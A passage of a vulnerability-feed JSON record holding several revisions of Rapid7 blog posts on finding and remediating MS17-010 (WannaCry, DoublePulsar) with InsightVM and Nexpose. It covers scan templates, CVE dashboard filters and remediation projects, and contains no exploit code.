asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">OR asset.vulnerability.title CONTAINS \"cve-2017-0102\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:7799e1bb-a165-4562-9f7e-a380f1695f31] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0102", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-05-18T16:33:44", "lastseen": "2017-05-20T14:50:01"}, "differentElements": ["description", "published", "modified"], "edition": 4}], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "<!-- [DocumentBodyStart:671843e7-7237-482e-9c1c-b149f122c46e] --><div class=\"jive-rendered-content\"><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/18/17: EternalBlue exploit (used in WannaCry attack) is now available in Metasploit for testing your compensating controls and validating remediations. More info: <a class=\"jive-link-blog-small\" data-containerId=\"1001\" data-containerType=\"37\" data-objectId=\"7880\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/metasploit/blog/2017/05/20/metasploit-the-power-of-the-community-and-eternalblue\">EternalBlue: Metasploit Module for MS17-010</a>. Also removed steps 5 and 6 from scan instructions as they were not strictly necessary and causing issues for some customers ***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 5/17/17: Unauthenticated remote checks have now been provided. </strong></span><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>For hosts that are locked down to prevent null or guest access an authenticated remote check has also been provided.</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>The pre-existing instructions below will enable the remote checks on creation of the template.***</strong></span></p><p><span style=\"color: black; font-size: 12pt; font-family: arial, helvetica, sans-serif;\"><strong>***Update 6/7/17: Fixed a small error in the dynamic asset group/dashboard section. We also now have a pre-built WannaCry dashboards in InsightVM***</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren&#8217;t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check &ldquo;<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>&#8221; and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\"><a href=\"https://files.slack.com/files-pri/T3V1ZDQHM-F5Q3XUAF6/pasted_image_at_2017_06_07_07_29_am.png\"><img class=\"jive-image\" height=\"260\" src=\"https://files.slack.com/files-pri/T3V1ZDQHM-F5Q3XUAF6/pasted_image_at_2017_06_07_07_29_am.png\" style=\"height: 280px; width: 815px;\" width=\"758\"/></a></p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR <span style=\"color: #000000; font-family: Calibri; font-size: 16px; background-color: #f6f6f6;\">asset.vulnerability.title CONTAINS \"cve-2017-0146\"</span>asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 14pt;\"><strong>Creating a SQL Query Export</strong></span></p><p>@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: <a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting</a></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66955/758-174/pastedImage_28.png\" style=\" width: 988.531px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in \"vulnerability.alternateIds &lt;=&gt; ( altId = \"ms17-010\" )\"</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66977/pastedImage_2.png\"><img class=\"image-15 jive-image\" height=\"473\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66977/758-473/pastedImage_2.png\" style=\" width: 767.39px;\" width=\"758\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability. </span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have JIRA, you can also configure the automatic ticketing integration between InsightVM and JIRA to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the WannaCry vulnerability as well as ensure that the vulns are being remediated. If you have any questions please don&#8217;t hesitate to let us know!</span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on WannaCry and ransomware, please visit this <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor%2F\" target=\"_blank\">page</a>. </span></p></div><!-- [DocumentBodyEnd:671843e7-7237-482e-9c1c-b149f122c46e] -->", "cvelist": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "href": "https://community.rapid7.com/community/nexpose/blog/2017/05/17/scanning-and-remediating-wannacry-in-insightvm-and-nexpose", "modified": "2017-06-07T14:57:05", "lastseen": "2017-06-19T18:16:21", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://community.rapid7.com/community/nexpose/blog/2017/06/23/protecting-against-doublepulsar-infection-with-insightvm-and-nexpose", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "history": [], "modified": "2017-06-23T21:23:11", "lastseen": "2017-06-24T01:16:32", "published": "2017-06-23T21:23:11", "description": "<!-- [DocumentBodyStart:53f4c57c-eea0-4790-a908-f2f47ce880e1] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">After <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">WannaCry</a> </span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">hit systems around the world last month, security experts warned that the underlying vulnerabilities that allowed the ransomworm to spread are still unpatched in many environments, rendering those systems vulnerable to other hacking tools from the same toolset. Rapid7&#8217;s Project Heisenberg continues to see a high volume of scans and exploit attempts targeting SMB vulnerabilities:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7919-67213/Heisenberg-smb-3.png\"><img alt=\"Heisenberg-smb-3.png\" class=\"image-1 jive-image\" height=\"351\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7919-67213/1600-351/Heisenberg-smb-3.png\" style=\"width: 620px; height: 136px;\" width=\"1600\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">DoublePulsar, a backdoor that has infected hundreds of thousands of computers, is one of the most nefarious of these tools: It can not only distribute ransomware but is also able to infect a system&#8217;s kernel to gain privileges and steal credentials. Identifying and patching vulnerable systems remains the best way to defend against the DoublePulsar implant. DoublePulsar is often delivered using the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Fwindows%2Fsmb%2Fms17_010_eternalblue\" target=\"_blank\">EternalBlue exploit package</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&mdash;MS17-010&mdash;which is the same vulnerability that gave rise to the widespread WannaCry infections in May. To help customers, we are reiterating the steps we issued for WannaCry on creating a scan, dynamic asset group, and remediation project for identifying and fixing these vulnerabilities. As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, you can <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\">download a trial of InsightVM here</a>. </span><span style=\"color: #1155cc; font-size: 11pt; font-family: Arial;\"><br/></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><strong>Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</strong></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\"><img class=\"jive-image\" height=\"229\" src=\"https://lh5.googleusercontent.com/x1_ZKgb3ubV8PD3kZISRmPSTuUjJtkdQoud1WlHM1a9DtuCllCiDxfT5oSWQIm1xdRAYoCF1dueJ_ZuxL5zqsPgyXm0dEM65xOcC4sZAhtdBqch5GFIxlnzyrmYHq8NFL3rj1L1U\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit without Web Spider. Don&#8217;t forget to give your copy a name and description; here, we&#8217;ll call it &ldquo;Double Pulsar and WNCRY Scan Template&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\"><img class=\"jive-image\" height=\"247\" src=\"https://lh6.googleusercontent.com/Jj64ZArECACxOW0ujCMLYRsoJyA6cxsxSagPzjQG4N_TgCs7UL57P78-jR7E-_zZ-cY-Shu0qNh-sB9dmpOBU9NIr4M2hdnCb0FmEZpOQqokyjtgmJYlM1ARRENiNdrJTWfC2Mqc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\"><img class=\"jive-image\" height=\"275\" src=\"https://lh3.googleusercontent.com/HwVeyrYQmMJBZ35P74ZDE0LjI_2gX6hHlW4BmdL7QD-Z6CLyZt4RsbkntzNxeAdNjRtPQKG3vqAjcgRYuYe_uHDiewJ0JcU0qXwrpIOhW8DfxmA4O0aKDoK2w9d4LAeoJriBfRJB\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then &ldquo;By Individual Check&#8221;</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\"><img class=\"jive-image\" height=\"265\" src=\"https://lh3.googleusercontent.com/BJD_-H1-kxX-FMLUb55BsaGLURg3gY4P9sxFn9_7oB2awAqPaLN1cbLCs3PEsJ2QrK07985ezeI_xZfHMeE6RilLuUxtK7md_9HxSEHmvqk0bZa9gmem4ZjBRGd9bnPU7YJe9w1q\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check \"<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>\"</span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\"><img class=\"jive-image\" height=\"227\" src=\"https://lh3.googleusercontent.com/L9dJFEgPzRJSWAaKsfK2gH9VMMhDYrYuuK8VGpIwUHDe5yAmjK4Plk37_nyzqsS_nuD2AwsJKfh_5JNH9Kp0zxEJ9MYevzTrp6bJAx-VQvm-i1kzb1JmFAMr6qwB7ROzgf1Uhkrc\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 195 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 10.5pt; font-family: Arial; color: 